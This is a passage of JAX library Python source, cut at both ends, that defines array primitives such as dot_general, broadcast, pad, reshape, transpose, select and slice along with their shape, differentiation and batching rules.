y_kept = remaining(range(y.ndim), y_contract, y_batch)
if swap_ans:
ans_batch, ans_y, _ = ranges_like(x_batch, y_kept, x_kept)
else:
ans_batch, _, ans_y = ranges_like(x_batch, x_kept, y_kept)
dims = ((ans_y, y_kept), (ans_batch, y_batch))
x_contract_sorted_by_y = list(np.take(x_contract, np.argsort(y_contract))) # type: ignore[arg-type]
out_axes = np.argsort(list(x_batch) + x_kept + x_contract_sorted_by_y)
return transpose(dot_general(g, y, dims, precision=precision, preferred_element_type=preferred_element_type),
tuple(out_axes))
def _dot_general_transpose_rhs(g, x, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
(x_contract, y_contract), (x_batch, y_batch) = dimension_numbers
swapped_dimension_numbers = ((y_contract, x_contract), (y_batch, x_batch))
return _dot_general_transpose_lhs(
g, x, dimension_numbers=swapped_dimension_numbers, precision=precision,
preferred_element_type=preferred_element_type,
swap_ans=True)
def _dot_general_batch_rule(batched_args, batch_dims, *, dimension_numbers,
precision,
preferred_element_type: Optional[DType]):
lhs, rhs = batched_args
new_dimension_numbers, result_batch_dim = _dot_general_batch_dim_nums(
(lhs.ndim, rhs.ndim), batch_dims, dimension_numbers)
batched_out = dot_general(lhs, rhs, new_dimension_numbers,
precision=precision,
preferred_element_type=preferred_element_type)
return batched_out, result_batch_dim
def _dot_general_batch_dim_nums(ndims, batch_dims, dimension_numbers):
# there are three kinds of dimensions in a dot_general:
# - contraction dimensions appear in lhs and rhs but not the result
# - batch dimensions appear in lhs, rhs, and result
# - tensor product dimensions appear in the result and one of lhs or rhs
lhs_ndim, rhs_ndim = ndims
lbd, rbd = batch_dims
assert lbd is not None or rbd is not None
(lhs_contract, rhs_contract), (lhs_batch, rhs_batch) = dimension_numbers
def bump_dims(dims, b):
return tuple(np.add(dims, np.greater_equal(dims, b)))
if lbd is not None and rbd is not None:
# adding a batch dimension
lhs_batch = (lbd,) + bump_dims(lhs_batch, lbd)
rhs_batch = (rbd,) + bump_dims(rhs_batch, rbd)
lhs_contract = bump_dims(lhs_contract, lbd)
rhs_contract = bump_dims(rhs_contract, rbd)
result_batch_dim = 0
else:
# adding a tensor product dimension
if lbd is not None:
other = tuple(d for d in range(lhs_ndim)
if d not in lhs_batch and d not in lhs_contract)
result_batch_dim = (len(lhs_batch) + sum(np.less(other, lbd)))
lhs_batch = bump_dims(lhs_batch, lbd)
lhs_contract = bump_dims(lhs_contract, lbd)
else:
other = tuple(d for d in range(rhs_ndim)
if d not in rhs_batch and d not in rhs_contract)
result_batch_dim = (lhs_ndim - len(lhs_contract) +
sum(np.less(other, rbd)))
rhs_batch = bump_dims(rhs_batch, rbd)
rhs_contract = bump_dims(rhs_contract, rbd)
new_dimension_numbers = ((lhs_contract, rhs_contract), (lhs_batch, rhs_batch))
return new_dimension_numbers, int(result_batch_dim)
def _dot_using_sum_of_products(lhs, rhs, *, dimension_numbers):
contract_dims, batch_dims = dimension_numbers
lhs_contract_dims, rhs_contract_dims = contract_dims
lhs_batch_dims, rhs_batch_dims = batch_dims
lhs_noncontract_dims = tuple(sorted(
set(range(np.ndim(lhs))) - set(lhs_batch_dims) - set(lhs_contract_dims)))
rhs_noncontract_dims = tuple(sorted(
set(range(np.ndim(rhs))) - set(rhs_batch_dims) - set(rhs_contract_dims)))
lhs = transpose(lhs,
lhs_batch_dims + lhs_noncontract_dims + lhs_contract_dims)
rhs = transpose(rhs,
rhs_batch_dims + rhs_noncontract_dims + rhs_contract_dims)
lhs_start_expand = len(lhs_batch_dims) + len(lhs_noncontract_dims)
lhs_end_expand = lhs_start_expand + len(rhs_noncontract_dims)
lhs = expand_dims(lhs, tuple(range(lhs_start_expand, lhs_end_expand)))
rhs_start_expand = len(lhs_batch_dims)
rhs_end_expand = rhs_start_expand + len(lhs_noncontract_dims)
rhs = expand_dims(rhs, tuple(range(rhs_start_expand, rhs_end_expand)))
out_ndim = (len(lhs_batch_dims) + len(lhs_noncontract_dims) +
len(rhs_noncontract_dims))
op_product = bitwise_and if lhs.dtype == np.bool_ else mul
op_sum = bitwise_or if lhs.dtype == np.bool_ else add
return reduce(op_product(lhs, rhs), _zero(lhs), op_sum,
tuple(range(out_ndim, out_ndim + len(lhs_contract_dims))))
def _dot_general_translation_rule(c, lhs, rhs, *, dimension_numbers, precision,
preferred_element_type: Optional[DType]):
if preferred_element_type is not None:
preferred_element_type = xla_client.dtype_to_etype(preferred_element_type)
return xops.DotGeneral(lhs, rhs,
xc.make_dot_dimension_numbers(dimension_numbers),
precision_config=_precision_config(precision),
preferred_element_type=preferred_element_type)
def _dot_general_masking_rule(padded_vals, logical_shapes, *, dimension_numbers,
precision,
preferred_element_type: Optional[DType]):
lhs, rhs = padded_vals
# Only need to mask off contraction dims of one side - we mask the lhs here
# but this is arbitrary. Could check the sizes of lhs and rhs and mask
# whichever is smallest.
lhs_shape, _ = logical_shapes
(lhs_contract, _), _ = dimension_numbers
return dot_general(_masked(lhs, lhs_shape, lhs_contract),
rhs, dimension_numbers, precision=precision,
preferred_element_type=preferred_element_type)
dot_general_p = standard_primitive(_dot_general_shape_rule,
_dot_general_dtype_rule, 'dot_general',
_dot_general_translation_rule)
ad.defbilinear(dot_general_p,
_dot_general_transpose_lhs, _dot_general_transpose_rhs)
batching.primitive_batchers[dot_general_p] = _dot_general_batch_rule
masking.masking_rules[dot_general_p] = _dot_general_masking_rule
def _broadcast_shape_rule(operand, sizes):
_check_shapelike('broadcast', 'sizes', sizes)
return tuple(sizes) + operand.shape
def _broadcast_batch_rule(batched_args, batch_dims, *, sizes):
operand, = batched_args
bdim, = batch_dims
new_bdim = None if bdim is None else bdim + len(sizes)
return broadcast(operand, sizes), new_bdim
broadcast_p = standard_primitive(
_broadcast_shape_rule, _input_dtype, 'broadcast')
ad.deflinear2(broadcast_p, lambda t, _, sizes: [_reduce_sum(t, range(len(sizes)))])
batching.primitive_batchers[broadcast_p] = _broadcast_batch_rule
def _broadcast_in_dim_impl(operand, *, shape, broadcast_dimensions):
if type(operand) is np.ndarray:
operand = _device_put_raw(operand)
if xla.type_is_device_array(operand) and np.all(
np.equal(operand.shape, np.take(shape, broadcast_dimensions))):
shape = _broadcast_in_dim_shape_rule(
operand, shape=shape, broadcast_dimensions=broadcast_dimensions)
aval = ShapedArray(shape, _dtype(operand), weak_type=dtypes.is_weakly_typed(operand))
if operand._lazy_expr is None:
lazy_expr = lazy.broadcast(lazy.array(operand.shape), shape, broadcast_dimensions)
else:
lazy_expr = lazy.broadcast(operand._lazy_expr, shape, broadcast_dimensions)
return xla._DeviceArray(aval, operand._device, lazy_expr, operand.device_buffer)
else:
return xla.apply_primitive(broadcast_in_dim_p, operand, shape=shape,
broadcast_dimensions=broadcast_dimensions)
def _broadcast_in_dim_shape_rule(operand, *, shape, broadcast_dimensions):
_check_shapelike('broadcast_in_dim', 'shape', shape)
_check_shapelike('broadcast_in_dim', 'broadcast_dimensions',
broadcast_dimensions)
operand_ndim = np.ndim(operand)
if operand_ndim != len(broadcast_dimensions):
msg = ('broadcast_in_dim broadcast_dimensions must have length equal to '
'operand ndim; got broadcast_dimensions {} for operand ndim {}.')
raise TypeError(msg.format(broadcast_dimensions, operand_ndim))
if len(shape) < operand_ndim:
msg = ('broadcast_in_dim target broadcast shape must have equal or higher rank '
'to the operand shape; got operand ndim {} and target broadcast ndim {}.')
raise TypeError(msg.format(operand_ndim, len(shape)))
if not set(broadcast_dimensions).issubset(set(range(len(shape)))):
msg = ('broadcast_in_dim broadcast_dimensions must be a subset of output '
'dimensions, got {} for operand ndim {} and shape {}.')
raise TypeError(msg.format(broadcast_dimensions, operand_ndim, shape))
if any(operand.shape[i] != shape[broadcast_dimensions[i]] and
operand.shape[i] != 1 for i in range(operand_ndim)):
msg = (
"broadcast_in_dim operand dimension sizes must either be 1, or be "
"equal to their corresponding dimensions in the target broadcast "
"shape; got operand of shape {}, target broadcast shape {}, "
"broadcast_dimensions {} ")
raise TypeError(msg.format(operand.shape, shape, broadcast_dimensions))
if (len(broadcast_dimensions) != len(set(broadcast_dimensions)) or
tuple(broadcast_dimensions) != tuple(sorted(broadcast_dimensions))):
msg = ("broadcast_in_dim broadcast_dimensions must be strictly increasing; "
"got broadcast_dimensions {}")
raise TypeError(msg.format(broadcast_dimensions))
return shape
def _broadcast_in_dim_transpose_rule(ct, operand, *, shape, broadcast_dimensions):
shape_in = operand.aval.shape
unit_dimensions = tuple(i for i, s in enumerate(shape_in) if s == 1)
bdims = tuple(np.delete(broadcast_dimensions, unit_dimensions))
axes = tuple(np.delete(range(len(shape)), bdims))
return [expand_dims(_reduce_sum(ct, axes), unit_dimensions)]
def _broadcast_in_dim_batch_rule(batched_args, batch_dims, *, shape,
broadcast_dimensions):
operand, = batched_args
bdim, = batch_dims
new_operand = batching.moveaxis(operand, bdim, 0)
new_shape = (operand.shape[bdim],) + shape
new_broadcast_dimensions = (0,) + tuple(np.add(1, broadcast_dimensions))
return broadcast_in_dim(new_operand, new_shape, new_broadcast_dimensions), 0
broadcast_in_dim_p = standard_primitive(
_broadcast_in_dim_shape_rule, _input_dtype, 'broadcast_in_dim')
broadcast_in_dim_p.def_impl(_broadcast_in_dim_impl)
ad.deflinear2(broadcast_in_dim_p, _broadcast_in_dim_transpose_rule)
batching.primitive_batchers[broadcast_in_dim_p] = _broadcast_in_dim_batch_rule
def _clamp_shape_rule(min, operand, max):
if min.shape and min.shape != operand.shape:
m = "clamp requires min.shape == operand.shape or min.shape == (), got {}."
raise TypeError(m.format(min.shape))
if max.shape and max.shape != operand.shape:
m = "clamp requires max.shape == operand.shape or max.shape == (), got {}."
raise TypeError(m.format(max.shape))
return operand.shape
_clamp_dtype_rule = partial(naryop_dtype_rule, _input_dtype, [_any, _any, _any],
'clamp')
clamp_p = standard_primitive(_clamp_shape_rule, _clamp_dtype_rule, 'clamp')
ad.defjvp(clamp_p,
lambda g, min, operand, max:
select(bitwise_and(gt(min, operand), lt(min, max)),
_brcast(g, operand), _zeros(operand)),
lambda g, min, operand, max:
select(bitwise_and(gt(operand, min), lt(operand, max)),
g, _zeros(operand)),
lambda g, min, operand, max:
select(lt(max, operand), _brcast(g, operand), _zeros(operand)))
batching.defbroadcasting(clamp_p)
def _concatenate_shape_rule(*operands, **kwargs):
dimension = kwargs.pop('dimension')
if not operands:
msg = "concatenate expects at least one operand, got 0."
raise TypeError(msg)
if not all(isinstance(operand, UnshapedArray) for operand in operands):
msg = "All objects to concatenate must be arrays, got {}."
op = next(op for op in operands if not isinstance(op, UnshapedArray))
raise TypeError(msg.format(type(op)))
if len({operand.ndim for operand in operands}) != 1:
msg = "Cannot concatenate arrays with different ranks, got {}."
raise TypeError(msg.format(", ".join(str(o.ndim) for o in operands)))
if not 0 <= dimension < operands[0].ndim:
msg = "concatenate dimension out of bounds: dimension {} for shapes {}."
raise TypeError(msg.format(dimension, ", ".join([str(o.shape) for o in operands])))
shapes = [operand.shape[:dimension] + operand.shape[dimension+1:]
for operand in operands]
if not shapes[:-1] == shapes[1:]:
msg = ("Cannot concatenate arrays with shapes that differ in dimensions "
"other than the one being concatenated: concatenating along "
"dimension {} for shapes {}.")
shapes = [operand.shape for operand in operands]
raise TypeError(msg.format(dimension, ", ".join(map(str, shapes))))
concat_size = sum(o.shape[dimension] for o in operands)
ex_shape = operands[0].shape
return ex_shape[:dimension] + (concat_size,) + ex_shape[dimension+1:]
def _concatenate_dtype_rule(*operands, **kwargs):
_check_same_dtypes('concatenate', False, *(o.dtype for o in operands))
return operands[0].dtype
def _concatenate_translation_rule(c, *operands, **kwargs):
dimension = kwargs.pop('dimension')
return xops.ConcatInDim(c, operands, dimension)
def _concatenate_transpose_rule(t, *operands, dimension):
operand_shapes = [o.aval.shape if ad.is_undefined_primal(o) else o.shape
for o in operands]
if type(t) is ad_util.Zero:
return [ad_util.Zero(o.aval) if ad.is_undefined_primal(o) else None
for o in operands]
else:
limit_points = np.cumsum([shape[dimension] for shape in operand_shapes])
starts = np.zeros((len(operands), t.ndim), dtype=int)
starts[1:, dimension] = limit_points[:-1]
limits = np.tile(t.shape, (len(operands), 1))
limits[:, dimension] = limit_points
return [slice(t, start, limit) if ad.is_undefined_primal(o) else None
for o, start, limit in zip(operands, starts, limits)]
def _concatenate_batch_rule(batched_args, batch_dims, *, dimension):
size = next(op.shape[bdim] for op, bdim in zip(batched_args, batch_dims)
if bdim is not None)
operands = [batching.moveaxis(op, bdim, 0) if bdim is not None
else broadcast(op, (size,))
for op, bdim in zip(batched_args, batch_dims)]
return concatenate(operands, dimension + 1), 0
# The concatenate_p masking rule requires use of a while-loop construct and so
# is defined in lax_control_flow.py
concatenate_p = standard_primitive(
_concatenate_shape_rule, _concatenate_dtype_rule, 'concatenate',
_concatenate_translation_rule)
ad.deflinear2(concatenate_p, _concatenate_transpose_rule)
ad.primitive_transposes[concatenate_p] = _concatenate_transpose_rule
batching.primitive_batchers[concatenate_p] = _concatenate_batch_rule
def _pad_dtype_rule(operand, padding_value, *, padding_config):
if operand.dtype != padding_value.dtype:
msg = "pad operand and padding_value must be same dtype: got {} and {}."
raise TypeError(msg.format(operand.dtype, padding_value.dtype))
return _input_dtype(operand, padding_value)
def _pad_shape_rule(operand, padding_value, *, padding_config):
del padding_value
if not len(padding_config) == np.ndim(operand):
raise ValueError("length of padding_config must equal the number of axes "
f"of operand, got padding_config {padding_config} "
f"for operand shape {np.shape(operand)}")
if not all(i >= 0 for _, _, i in padding_config):
raise ValueError("interior padding in padding_config must be nonnegative, "
f"got padding_config {padding_config}")
return tuple(l + h + d + (_max(0, d - 1) * i if i > 0 else 0)
for (l, h, i), d in zip(padding_config, np.shape(operand)))
def _pad_transpose(t, operand, padding_value, *, padding_config):
if type(t) is ad_util.Zero:
t_operand = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
t_padv = ad_util.Zero(padding_value.aval) if ad.is_undefined_primal(padding_value) else None
else:
lo, hi, interior = zip(*padding_config)
total = lambda x: _reduce_sum(x, list(range(t.ndim)))
def t_op():
unpad_config = safe_zip(np.negative(lo), np.negative(hi),
np.zeros_like(interior))
unpadded = pad(t, np.array(0., t.dtype), unpad_config)
return slice(unpadded, np.zeros_like(lo), unpadded.shape, np.add(interior, 1))
t_operand = t_op() if ad.is_undefined_primal(operand) else None
t_padv = sub(total(t), total(t_operand)) if ad.is_undefined_primal(padding_value) else None
return [t_operand, t_padv]
def _pad_batch_rule(batched_args, batch_dims, *, padding_config):
operand, padding_value = batched_args
operand_bdim, padding_value_bdim = batch_dims
if padding_value_bdim is None:
assert operand_bdim is not None
padding_config = list(padding_config)
padding_config.insert(operand_bdim, (0, 0, 0))
return pad(operand, padding_value, padding_config), operand_bdim
else:
raise NotImplementedError # loop and stack
def _pad_translation_rule(c, operand, padding_value, *, padding_config):
return xops.Pad(operand, padding_value,
xc.make_padding_config(padding_config))
def _pad_masking_rule(padded_vals, logical_shapes, padding_config):
operand, padding_value = padded_vals
shape, _ = logical_shapes
out = pad(operand, padding_value, padding_config)
out_shape = [lo + shape[i] * (interior + 1)
for i, (lo, hi, interior) in enumerate(padding_config)]
padded_dims = [i for i, config in enumerate(padding_config)
if config != (0, 0, 0)]
return _masked(out, out_shape, padded_dims, padding_value)
pad_p = standard_primitive(_pad_shape_rule, _pad_dtype_rule, 'pad',
translation_rule=_pad_translation_rule)
ad.deflinear2(pad_p, _pad_transpose)
batching.primitive_batchers[pad_p] = _pad_batch_rule
masking.masking_rules[pad_p] = _pad_masking_rule
# The squeeze primitive exists for the benefit of masking and other
# transformations that need to keep track of axis identity.
# For example, consider reshaping a 2D array with shape (1, N) into a 1D array
# with shape (N,). This results in the following JAXpr:
# reshape[ dimension=None new_sizes=(N,) ]
# For N > 1, we can match up the output array axis with the second axis of the
# input. But for N = 1, it is not clear how axes match up: all we know from the
# JAXpr is that we are reshaping from (1, 1) to (1,).
# In constrast, squeeze[ dimensions=(0,) ] is unambiguous.
def squeeze(array: Array, dimensions: Tuple[int, ...]) -> Array:
"""Squeeze any number of size 1 dimensions from an array."""
ndim = np.ndim(array)
dimensions = tuple(sorted(canonicalize_axis(i, ndim) for i in dimensions))
if not dimensions:
return array
return squeeze_p.bind(array, dimensions=dimensions)
def _squeeze_dtype_rule(operand, *, dimensions):
return operand.dtype
def _squeeze_shape_rule(operand, *, dimensions):
return _compute_squeeze_shape(np.shape(operand), dimensions)
def _compute_squeeze_shape(shape, dimensions):
dims_set = set(dimensions)
if len(dims_set) != len(dimensions):
raise ValueError(f"dimensions are not unique: {dimensions}")
if not all(0 <= d < len(shape) for d in dims_set):
raise ValueError(f"dimensions outside range [0, ndim): {dimensions}")
if any(shape[d] != 1 for d in dimensions):
raise ValueError(
"cannot select an axis to squeeze out which has size not equal to "
f"one, got shape={shape} and dimensions={dimensions}")
return tuple(s for i, s in enumerate(shape) if i not in dims_set)
def _squeeze_translation_rule(c, arg, *, dimensions):
new_shape = _compute_squeeze_shape(c.get_shape(arg).dimensions(), dimensions)
return xops.Reshape(arg, new_shape)
def _squeeze_transpose_rule(t, operand, *, dimensions):
assert ad.is_undefined_primal(operand)
return [expand_dims(t, dimensions)]
def _squeeze_batch_rule(batched_args, batch_dims, *, dimensions):
operand, = batched_args
bdim, = batch_dims
operand = batching.moveaxis(operand, bdim, 0)
dimensions = tuple(np.add(1, dimensions))
return squeeze(operand, dimensions=dimensions), 0
squeeze_p = standard_primitive(_squeeze_shape_rule, _squeeze_dtype_rule,
'squeeze', _squeeze_translation_rule)
ad.deflinear2(squeeze_p, _squeeze_transpose_rule)
batching.primitive_batchers[squeeze_p] = _squeeze_batch_rule
def expand_dims(array: Array, dimensions: Tuple[int, ...]) -> Array:
"""Insert any number of size 1 dimensions into an array."""
ndim_out = np.ndim(array) + len(dimensions)
dims_set = frozenset(canonicalize_axis(i, ndim_out) for i in dimensions)
result_shape = list(np.shape(array))
for i in sorted(dims_set):
result_shape.insert(i, 1)
broadcast_dims = [i for i in range(ndim_out) if i not in dims_set]
return broadcast_in_dim(array, result_shape, broadcast_dims)
# We have a nonstandard reshape impl so that we can be lazy about data movement.
def _reshape_impl(operand, *, new_sizes, dimensions):
old_sizes = np.shape(operand)
if xla.type_is_device_array(operand) and dimensions is None:
bcast_dims = _is_singleton_reshape(old_sizes, new_sizes)
if bcast_dims is not None:
aval = ShapedArray(new_sizes, operand.dtype)
if operand._lazy_expr is None:
lazy_expr = lazy.broadcast(lazy.array(operand.shape), new_sizes, bcast_dims)
else:
lazy_expr = lazy.broadcast(operand._lazy_expr, new_sizes, bcast_dims)
return xla._DeviceArray(aval, operand._device, lazy_expr, operand.device_buffer)
return xla.apply_primitive(reshape_p, operand, new_sizes=new_sizes,
dimensions=dimensions)
def _is_singleton_reshape(old, new):
# A singleton reshape is one where only singleton dimensions are added. We
# want to detect them because they can be expressed as (lazy) broadcasts.
old, new = iter(old), iter(new)
d1, d2 = next(old, None), next(new, None)
bcast_dims = []
i = 0
while True:
if d1 is d2 is None:
return bcast_dims
elif d1 == d2:
bcast_dims.append(i)
i += 1
d1, d2 = next(old, None), next(new, None)
elif d2 == 1:
i += 1
d2 = next(new, None)
else:
return None
def _reshape_shape_rule(operand, *, new_sizes, dimensions):
if not np.all(np.greater_equal(new_sizes, 0)):
msg = 'reshape new_sizes must all be positive, got {}.'
raise TypeError(msg.format(new_sizes))
if prod(np.shape(operand)) != prod(new_sizes):
msg = 'reshape total size must be unchanged, got new_sizes {} for shape {}.'
raise TypeError(msg.format(new_sizes, np.shape(operand)))
if dimensions is not None:
if set(dimensions) != set(range(np.ndim(operand))):
msg = ('reshape dimensions must be a permutation of operand dimensions, '
'got dimensions {} for shape {}.')
raise TypeError(msg.format(dimensions, np.shape(operand)))
return tuple(new_sizes)
def _reshape_dtype_rule(operand, *, new_sizes, dimensions):
return operand.dtype
def _reshape_translation_rule(c, operand, *, new_sizes, dimensions):
if dimensions is None:
return xops.Reshape(operand, new_sizes)
else:
return xops.Reshape(operand, dimensions, new_sizes)
def _reshape_transpose_rule(t, operand, *, new_sizes, dimensions):
assert ad.is_undefined_primal(operand)
if dimensions is None:
return [reshape(t, operand.aval.shape)]
else:
return [transpose(reshape(t, np.take(operand.aval.shape, dimensions)),
np.argsort(dimensions))]
def _reshape_batch_rule(batched_args, batch_dims, *, new_sizes, dimensions):
operand, = batched_args
bdim, = batch_dims
operand = batching.moveaxis(operand, bdim, 0)
if dimensions is not None:
dimensions = (0,) + tuple(np.add(1, dimensions))
return reshape(operand, operand.shape[:1] + new_sizes, dimensions), 0
def _reshape_masking_rule(padded_args, logical_shapes, polymorphic_shapes,
new_sizes, dimensions):
operand, = padded_args
old_shape, = polymorphic_shapes
def is_poly(size): return type(size) is masking.Poly and not size.is_constant
def merge_const_sizes(shape):
"""Merges all nonpolymorphic sizes into the previous polymorphic size."""
poly_dims = [i for i, size in enumerate(shape) if is_poly(size)]
return [prod(shape[start:stop])
for start, stop in zip([0] + poly_dims, poly_dims + [len(shape)])]
if merge_const_sizes(old_shape) != merge_const_sizes(new_sizes):
raise NotImplementedError(
"Reshape on padded dimensions causing fragmentation is not supported.")
return reshape(operand,
new_sizes=masking.padded_shape_as_value(new_sizes),
dimensions=dimensions)
reshape_p = standard_primitive(_reshape_shape_rule, _reshape_dtype_rule,
'reshape', _reshape_translation_rule)
reshape_p.def_impl(_reshape_impl)
ad.deflinear2(reshape_p, _reshape_transpose_rule)
batching.primitive_batchers[reshape_p] = _reshape_batch_rule
masking.masking_rules[reshape_p] = _reshape_masking_rule
def _rev_shape_rule(operand, *, dimensions):
_check_shapelike('rev', 'dimensions', dimensions)
if len(set(dimensions)) != len(dimensions):
msg = 'rev dimensions must be unique, got {}.'
raise TypeError(msg.format(dimensions))
if dimensions and not _max(dimensions) < operand.ndim:
msg = ('rev dimensions must all be less than operand ndim, got dimensions '
'{} for operand ndim {}.')
raise TypeError(msg.format(dimensions, operand.ndim))
return operand.shape
def _rev_batch_rule(batched_args, batch_dims, *, dimensions):
operand, = batched_args
bdim, = batch_dims
new_dimensions = [i + 1 if i >= bdim else i for i in dimensions]
return rev(operand, new_dimensions), bdim
rev_p = standard_primitive(_rev_shape_rule, _input_dtype, 'rev')
ad.deflinear2(rev_p, lambda t, _, dimensions: [rev(t, dimensions)])
batching.primitive_batchers[rev_p] = _rev_batch_rule
def _transpose_impl(operand, *, permutation):
if xla.type_is_device_array(operand):
if operand._lazy_expr is None:
lazy_expr = lazy.transpose(lazy.array(operand.shape), permutation)
else:
lazy_expr = lazy.transpose(operand._lazy_expr, permutation)
aval = ShapedArray(lazy_expr.shape, operand.dtype)
return xla._DeviceArray(aval, operand._device, lazy_expr, operand.device_buffer)
else:
return xla.apply_primitive(transpose_p, operand, permutation=permutation)
def _transpose_shape_rule(operand, *, permutation):
if not isinstance(permutation, (tuple, list, np.ndarray)):
msg = "transpose permutation must be a tuple/list/ndarray, got {}."
raise TypeError(msg.format(type(permutation)))
if tuple(sorted(permutation)) != tuple(range(operand.ndim)):
msg = ("transpose permutation isn't a permutation of operand dimensions, "
"got permutation {} for operand shape {}.")
raise TypeError(msg.format(permutation, operand.shape))
return tuple(np.take(operand.shape, permutation))
def _transpose_batch_rule(batched_args, batch_dims, *, permutation):
operand, = batched_args
bdim, = batch_dims
perm = (bdim,) + tuple(i if i < bdim else i+1 for i in permutation)
return transpose(operand, perm), 0
def _transpose_masking_rule(padded_vals, logical_shapes, permutation):
return transpose(*padded_vals, permutation=permutation)
transpose_p = standard_primitive(_transpose_shape_rule, _input_dtype,
'transpose')
transpose_p.def_impl(_transpose_impl)
ad.deflinear2(transpose_p,
lambda t, _, permutation: [transpose(t, np.argsort(permutation))]) # type: ignore[arg-type]
batching.primitive_batchers[transpose_p] = _transpose_batch_rule
masking.masking_rules[transpose_p] = _transpose_masking_rule
def _select_shape_rule(pred, on_true, on_false):
if on_true.shape != on_false.shape:
msg = "select on_true and on_false must have the same shape, got {} and {}."
raise TypeError(msg.format(on_true.shape, on_false.shape))
if pred.shape and pred.shape != on_true.shape:
msg = ("select pred must be scalar or have the same shape as on_true and "
"on_false, got pred shape {} for on_true and on_false of shape {}.")
raise TypeError(msg.format(pred.shape, on_true.shape))
return on_true.shape
def _select_dtype_rule(pred, on_true, on_false):
_check_same_dtypes("select", False, on_true.dtype, on_false.dtype)
if not dtypes.issubdtype(pred.dtype, np.bool_):
msg = "select pred must be boolean type, got {}."
raise TypeError(msg.format(pred.dtype))
return on_true.dtype
def _select_transpose_rule(t, pred, on_true, on_false):
assert not ad.is_undefined_primal(pred)
if type(t) is ad_util.Zero:
return [None,
ad_util.Zero(on_true.aval) if ad.is_undefined_primal(on_true) else None,
ad_util.Zero(on_false.aval) if ad.is_undefined_primal(on_false) else None]
else:
zeros = full_like(t, 0)
return [None,
select(pred, t, zeros) if ad.is_undefined_primal(on_true) else None,
select(pred, zeros, t) if ad.is_undefined_primal(on_false) else None]
def _select_batch_rule(batched_args, batch_dims, **unused_kwargs):
pred, on_true, on_false, = batched_args
pred_bdim, ot_bdim, of_bdim = batch_dims
size = next(x.shape[i] for x, i in zip(batched_args, batch_dims)
if i is not None)
# avoid transposes and some broadcasts in special cases
if pred_bdim == ot_bdim == of_bdim:
if np.shape(pred) == np.shape(on_true):
return select(pred, on_true, on_false), pred_bdim
else:
# vmapped function had a scalar pred with nonscalar args
assert np.ndim(pred) == 1
pred = broadcast_in_dim(pred, on_true.shape, [pred_bdim])
return select(pred, on_true, on_false), pred_bdim
elif np.ndim(pred) == 0 and ot_bdim is not None and of_bdim is not None:
if ot_bdim == of_bdim:
return select(pred, on_true, on_false), ot_bdim
elif np.shape(on_true) == np.shape(on_false):
on_false = batching.moveaxis(on_false, of_bdim, ot_bdim)
return select(pred, on_true, on_false), ot_bdim
pred = batching.bdim_at_front(pred, pred_bdim, size) if np.shape(pred) else pred
if not np.shape(on_true) == np.shape(on_false) == ():
on_true = batching.bdim_at_front(on_true, ot_bdim, size)
on_false = batching.bdim_at_front(on_false, of_bdim, size)
assert np.shape(on_true) == np.shape(on_false)
if 0 < np.ndim(pred) < np.ndim(on_true):
# vmapped function had a scalar pred with nonscalar args
assert np.ndim(pred) == 1
pred = broadcast_in_dim(pred, on_true.shape, [0])
if np.ndim(pred) > np.ndim(on_true):
assert np.ndim(on_true) == 0
on_true = broadcast(on_true, pred.shape)
on_false = broadcast(on_false, pred.shape)
return select(pred, on_true, on_false), 0
def _select_masking_rule(padded_vals, logical_shapes):
pred_shape, true_shape, false_shape = [
masking.padded_shape_as_value(val.shape) for val in padded_vals]
assert np.array_equal(pred_shape, true_shape)
assert np.array_equal(pred_shape, false_shape)
return select(*padded_vals)
def _select_jvp(primals, tangents):
pred, on_true, on_false = primals
_, on_true_dot, on_false_dot = tangents
out = select(pred, on_true, on_false)
if type(on_true_dot) is ad_util.Zero:
out_dot = select(pred, _zeros(on_false_dot), on_false_dot)
elif type(on_false_dot) is ad_util.Zero:
out_dot = select(pred, on_true_dot, _zeros(on_true_dot))
else:
out_dot = select(pred, on_true_dot, on_false_dot)
return out, out_dot
select_p = standard_primitive(_select_shape_rule, _select_dtype_rule, 'select',
weak_type_rule=_argnum_weak_type(1, 2))
ad.primitive_jvps[select_p] = _select_jvp
ad.primitive_transposes[select_p] = _select_transpose_rule
batching.primitive_batchers[select_p] = _select_batch_rule
masking.masking_rules[select_p] = _select_masking_rule
def _slice_shape_rule(operand, *, start_indices, limit_indices, strides):
_check_shapelike("slice", "start_indices", start_indices)
_check_shapelike("slice", "limit_indices", limit_indices)
if operand.ndim != len(start_indices):
msg = ("slice start_indices must have length equal to the number of "
"dimensions of the operand, got indices {} for operand shape {}.")
raise TypeError(msg.format(start_indices, operand.shape))
if len(start_indices) != len(limit_indices):
msg = ("slice limit_indices must have the same length as start_indices, "
"got start_inidices {} and limit_indices {}.")
raise TypeError(msg.format(start_indices, limit_indices))
if (not masking.is_polymorphic(limit_indices) and
not masking.is_polymorphic(operand.shape) and
not np.all(np.less_equal(limit_indices, operand.shape))):
msg = ("slice limit_indices must be less than or equal to operand shape, "
"got limit_indices {} for operand shape {}.")
raise TypeError(msg.format(limit_indices, operand.shape))
if not np.all(np.greater_equal(start_indices, 0)):
msg = ("slice start_indices must be greater than or equal to zero, "
"got start_indices of {}.")
raise TypeError(msg.format(start_indices))
if (not masking.is_polymorphic(limit_indices) and
not np.all(np.greater_equal(limit_indices, start_indices))):
msg = ("slice limit_indices must be greater than or equal to start_indices,"
" got start_indices {} and limit_indices {}.")
raise TypeError(msg.format(start_indices, limit_indices))
if strides is None:
strides = np.ones(operand.ndim, np.int32)
else:
_check_shapelike("slice", "strides", strides)
if len(strides) != operand.ndim:
msg = ("slice strides must have length equal to the number of dimensions "
"of the operand, got strides {} for operand shape {}.")
raise TypeError(msg.format(strides, operand.shape))
if not np.all(np.greater(strides, 0)):
msg = "slice strides must be positive, got {}"
raise TypeError(msg.format(strides))
diff = np.subtract(limit_indices, start_indices)
# Not np.divmod since Poly.__rdivmod__ is ignored by NumPy, breaks poly stride
return tuple(q + (r > 0) for q, r in map(divmod, diff, strides))
def _slice_translation_rule(c, operand, *, start_indices, limit_indices,
strides):
return xops.Slice(operand, start_indices, limit_indices,
strides or [1] * len(start_indices))
def _slice_transpose_rule(t, operand, *, start_indices, limit_indices, strides):
assert ad.is_undefined_primal(operand)
operand_shape = operand.aval.shape
if strides is None or np.all(np.equal(strides, 1)):
pads = zip(start_indices, np.subtract(operand_shape, limit_indices),
(0,) * len(start_indices))
else:
real_limits = np.add(
start_indices,
np.where(np.array(t.shape) == 0, 0,
np.add(1, np.multiply(np.subtract(t.shape, 1), strides))))
pads = safe_zip(start_indices, np.subtract(operand_shape, real_limits),
np.subtract(strides, 1))
